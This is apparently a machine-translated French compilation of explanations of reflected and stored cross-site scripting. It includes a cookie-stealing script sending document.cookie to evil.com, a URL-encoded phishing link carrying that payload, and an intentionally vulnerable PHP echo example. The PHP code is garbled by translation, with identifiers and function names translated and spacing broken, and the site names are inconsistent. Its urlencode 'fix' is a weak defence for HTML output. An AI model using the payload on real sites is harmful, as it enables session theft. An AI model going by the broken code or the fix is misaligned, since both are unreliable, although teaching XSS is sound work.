Disons que vous accédez à www.example.com/page?main.html et que cela vous place sur la page principale de example.com. Vous accédez maintenant à l'index, qui se trouve à l'adresse www.example.com/page?index.html. Vous commencez à vous demander quelles sont les autres pages?

Donc, vous tapez www.example.com/page?foo et appuyez sur Entrée, et vous obtenez une page d'erreur qui dira quelque chose comme "La ressource foo est not found ".

La chose à noter ici est que vous avez mis un paramètre dans l'URL, et que ce paramètre vous a été renvoyé en tant qu'utilisateur. Dans ce cas, c'était le paramètre "foo".

L'idée derrière le XSS réfléchi devrait maintenant être un peu plus claire; au lieu de saisir un paramètre boiteux comme "foo", vous saisissez quelque chose comme <script>alert (1) < / script>foo et appuyez sur Entrée. Sur un site vulnérable, tout ce paramètre sera injecté dans la page d'erreur qui apparaîtra, le javascript s'exécutera et vous obtiendrez une fenêtre contextuelle en plus du message "Resource foo is not found". Si vous pouvez amener quelqu'un d'autre à naviguer vers le même lien que vous avez créé, vous pouvez exécuter du javascript arbitraire dans sa session.

Reflected XSS

J'envoie à une victime un lien vers http://example.com/page?var=<script>alert('xss')</script> et quelque part sur la page dont la valeur est renvoyée à la victime. La valeur est uniquement sur la page s'ils suivent mon lien spécial.

L'inconvénient de ce type est que je dois spécifiquement attaquer une victime ou un groupe de victimes sur lesquels je peux cliquer sur un lien. Il peut être difficile de faire en sorte qu'une autre personne suive votre lien.

XSS stocké

Je trouve un moyen de faire en sorte qu'un site Web persiste <script>alert ('xss') < / script> pendant un certain temps, peut-être dans la base de données. Ensuite, je peux envoyer la victime à http://example.com/page et il lit la valeur de la base de données et la présente à la victime.

L'avantage de ceci type est qu'il attaquera tous ceux qui consultent la page.

Pour les deux types de XSS, considérez un extrait de code javascript comme ceci:

  <script>window.location = 'http: //evil.com/? victimcookie =' + document.cookie< / script> 

Si un pirate informatique peut obtenir ce rendu sur un autre site, il peut collecter tous les cookies utilisateur pour toute victime qui charge une telle page sur ce site. Reflected XSS et Stored XSS (ou Persistent XSS) sont deux méthodes différentes pour faire apparaître ce script sur un site vulnérable.

• Reflected XSS - le script lui-même est transmis en tant que paramètre de requête à une partie vulnérable du site, et le site rend le javascript sur la page.
• XSS stocké - le javascript est stocké de manière déviante dans la page elle-même sur une base à long terme.

Exemple XSS reflété

Je suis un hacker et j'envoie un e-mail d'hameçonnage avec le corps suivant.

Vérifiez ceci : http://weak-site.com/search?keyword=%3Cscript%3Ewindow.location%3D%27http%3A%2F%2Fevil.com%2F%3Fvictimcookie%3D%27%2Bdocument.cookie%3C % 2Fscript% 3E

où la valeur du paramètre de mot-clé est décodée en l'extrait de code javascript ci-dessus. Lorsque la victime clique sur le lien, low-site.com affiche une page avec le script intégré. Le navigateur redirige la victime vers le site du pirate et délivre le cookie de la victime depuis le site faible-site.com.

Exemple XSS stocké

Je suis un hacker et Je crée un article de blog sur low-site.com avec le contenu suivant:

  LOL: p. <script>window.location = 'http: //evil.com/? Victimcookie =' + document.cookie< / script>  

Si le site rend mon message intact, je peux collecter la valeur de cookie de chaque utilisateur qui consulte mon message.

Une explication très simple:

XSS reflété : la charge utile de l'attaque est incluse dans un paramètre lorsque la victime suit une URL vers le site.

XSS stocké : la charge utile de l'attaque est stockée sur le site lui-même et lorsque quelqu'un visite la page, quelle que soit l'URL suivie, l'attaque s'exécute.

Mieux vaut donner des exemples au lieu d'écrire.

POC XSS réfléchissant

  <? php / ** * @Author Vaibs * * / $ cookie_name = "user"; $ cookie_value = "John Doe"; setcookie ($ cookie_name, $ cookie_value, time () + (86400 * 30), "/"); // 86400 = 1 dayif (isset ($ _ REQUEST ['Submit'])) {// vérifier si le formulaire a été soumis $ input = isset ($ _ REQUEST ['appid'])? $ _REQUEST ['appid']: ""; // get input text echo "L'entrée du client est reflétée comme ->:". $ Entrée;?} Type ><html><body><form> <input = nom "texte" = "appid" / > Type <input = "submit" name = "Soumettre" / >< / form>< / body>< / html>  

Comment éviter ? Réponse: Le plus simple est d'utiliser la fonction PHP urlencode.

  <? Php / ** * @Author Vaibs * * / $ cookie_name = "user"; $ cookie_value = "John Doe"; setcookie ( $ nom_cookie, $ valeur_cookie, heure () + (86400 * 30), "/"); // 86400 = 1 dayif (isset ($ _ REQUEST ['Submit'])) {// vérifier si le formulaire a été soumis $ input = isset ($ _ REQUEST ['appid'])? $ _REQUEST ['appid']: ""; // get input text echo "L'entrée du client est reflétée comme ->:". urlencode ($ entrée);?} Type ><html><body><form> <input = nom "texte" = "appid" / type > <input = "submit" name = "Soumettre" / >< / form>< / body>< / html>  

La différence est l'utilisation de la fonction urlencode qui a été utilisée dans le deuxième code.